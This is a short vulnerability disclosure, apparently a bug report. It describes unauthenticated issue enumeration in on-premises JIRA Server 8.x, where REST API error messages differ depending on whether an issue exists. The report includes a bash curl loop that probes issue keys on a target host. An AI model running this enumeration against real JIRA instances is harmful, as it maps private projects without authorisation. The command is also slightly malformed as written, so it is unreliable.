I detected that in JIRA onprem with API REST exposed an attacker that knows (or discover) the name of a project can enumerate the issues that exists related to the project. All of this without logged in on JIRA or any credentials.

The response of the server changes when the issue exists on the system. For example if the issue exists the system returned that:

"{"errorMessages":["You do not have the permission to see the specified issue.","Login Required"],"errors":{}}"

And if the issue not exists the system returned that:
{"errorMessages":["Issue Does Not Exist"],"errors":{}}

It depends on the language, the message will change. For example in spanish, when a issue not exists the results was this:

{"errorMessages":["La Incidencia no Existe"],"errors":{}}

And when the issue exists the results was this:

{"errorMessages":["Usted no tiene permiso para ver la incidencia especificada.","Se requiere identificación previa"],"errors":{}}

So a threat actor can enumerate the issues of a project automatically as I shown in the attached pictures with a simple for in bash.

Tested in JIRA Server 8.20.1 and 8.13.4

The launched command was the following:

for i in {1..100}; do curl s -X GET https://jira.site.es/rest/api/2/issue/PROJECTNAME-$i --output test$i.gz ; done && gunzip *.gz &>/dev/null ; ls | grep v 'gz' | awk -F"" '{print "https://jira.site.es/rest/api/2/issue/PROJECTNAME-"$2}'

All the files that I can decompress as gz file has the message of I hadn't permissions to access it and the rest of them the message was that the incident was not exists.

You could maybe consider to assign a CVE to this issue.

I attach as a link the screenshots because I can't do it uploading files:

jira-1
jira-2

Thanks.